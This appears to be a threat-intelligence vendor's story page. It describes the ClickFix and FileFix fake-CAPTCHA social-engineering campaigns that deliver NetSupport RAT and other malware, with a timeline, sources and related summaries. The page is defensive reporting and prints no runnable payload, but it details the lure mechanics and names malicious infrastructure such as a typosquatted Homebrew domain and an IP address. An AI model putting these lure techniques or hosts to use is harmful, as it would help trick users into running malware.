ClickFix and FileFix Social Engineering Techniques for Malware Delivery
Cybercriminals are leveraging social engineering techniques known as ClickFix and its new variant, FileFix, to trick users into executing malicious commands on their Windows systems. The ClickFix method involves compromised websites displaying fake CAPTCHA-style pages that prompt users to "verify you are human." When users interact with these pages, malicious content is injected into their clipboard, and they are instructed to paste and run this content via the Windows Run dialog, leading to the installation of remote access tools such as NetSupport RAT. The SmartApeSG campaign is one example actively using this approach, with infection chains triggered under specific conditions on compromised sites.
The FileFix variation, recently observed in the wild, shifts the attack vector by instructing users to paste malicious commands into the Windows File Explorer address bar instead of the Run dialog. This subtle change exploits user familiarity with File Explorer, making the attack less suspicious and increasing the likelihood of success. Both techniques rely on phishing emails or fake service pages to lure victims, and the end goal is typically the deployment of remote access malware. Security teams should be aware of these evolving tactics and educate users about the risks of following unsolicited instructions involving system dialogs or file paths.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
5 events from the most recent confirmed update back to the earliest known activity.
SmartApeSG adopts new password-protected ZIP delivery scheme
On 2026-04-06, SmartApeSG activity was documented using injected scripts on a compromised website to send users to a fake CAPTCHA ClickFix page, with malware delivered in password-protected ZIP archives. The report noted a new password scheme in which the archive password was posted on the malicious site's About page, and indicated the malware could persist on infected Windows hosts.
SANS ISC details SmartApeSG ClickFix-to-NetSupport RAT infection chain
SANS ISC published a lab analysis of a SmartApeSG campaign in which compromised sites use hidden injected scripts to redirect victims to fake CAPTCHA pages that ultimately install NetSupport RAT. The report included technical details such as delivery URLs, a SHA-256 hash for the ZIP payload, persistence via a Start Menu shortcut and .js file, and observed C2 traffic over TCP/443.
SmartApeSG shifts to ClickFix-style fake CAPTCHA delivery
By late 2025, SmartApeSG was observed using ClickFix-style fake CAPTCHA pages instead of earlier fake update lures. The pages trick users into pasting a clipboard-injected mshta command into the Windows Run dialog, leading to NetSupport RAT delivery.
Researchers publish FileFix as a new ClickFix variation
Kaspersky published research describing FileFix as a new variation of the ClickFix social-engineering technique targeting Windows File Explorer users. The publication marked public disclosure of this new ClickFix variant.
SmartApeSG activity documented since at least June 2024
The SmartApeSG threat cluster, also tracked as ZPHP or HANEYMANEY, has been reported since at least June 2024. Earlier activity used social-engineering lures such as fake browser updates to infect victims.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
3 references tracked. Mallory keeps watching after this page renders.
Malware-Traffic-Analysis.net - 2026-04-06: SmartApeSG activity
malware-traffic-analysis.net
Open sourceSmartApeSG campaign uses ClickFix page to push NetSupport RAT
isc.sans.edu
Open sourceFileFix: a new ClickFix variation
kaspersky.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
ClickFix Malware Attacks Employ Advanced Social Engineering and Multi-OS Support
Attackers have significantly upgraded the ClickFix malware delivery technique, incorporating sophisticated social engineering tactics inspired by online retail sites. Recent campaigns feature embedded tutorial videos, countdown timers, and dynamic counters such as "users verified in the last hour" to create a sense of urgency and legitimacy, closely mimicking trusted services like Cloudflare's bot checks. The malicious pages automatically detect the visitor's operating system and provide tailored instructions, even copying the necessary malicious code to the user's clipboard via JavaScript, making the infection process seamless and convincing for victims. ClickFix lures are distributed through multiple channels, including email, instant messaging, social networks, in-app phishing, and especially malvertising on platforms like Google Search, YouTube, and Steam. The primary objective is to trick users into pasting and executing malicious code, which typically results in the deployment of information-stealing malware. According to Push Security and the 2025 Microsoft Digital Defense report, ClickFix has become the most prevalent initial access method, accounting for nearly half of observed attacks in the past year. The evolution of these attacks, with multi-OS support and enhanced deception techniques, underscores the growing sophistication and reach of social engineering threats in the current threat landscape.
Mar 21, 2026
ClickFix and Cache Smuggling Techniques Used for Malware Delivery
Attackers are leveraging ClickFix-style phishing pages to deliver malware by exploiting browser cache mechanisms and social engineering tactics. In these campaigns, malicious websites masquerade as Captcha tests and prompt users to execute clipboard-injected commands via the Windows Run dialog, enabling the execution of arbitrary code. A notable evolution of this technique involves using cache smuggling, where the initial loader extracts the second-stage payload directly from the browser's cache, bypassing the need for direct web requests and evading some detection mechanisms. Recent campaigns have combined these methods with the deployment of remote access tools such as NetSupport RAT, using ClickFix lures to infect hosts and establish covert access. Multiple threat clusters have been observed utilizing remote monitoring and management (RMM) software for persistent, stealthy access to compromised systems. These developments highlight the increasing sophistication of social engineering and technical delivery mechanisms in modern malware campaigns, emphasizing the need for heightened user awareness and advanced detection strategies.
Mar 21, 2026
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
Mar 21, 2026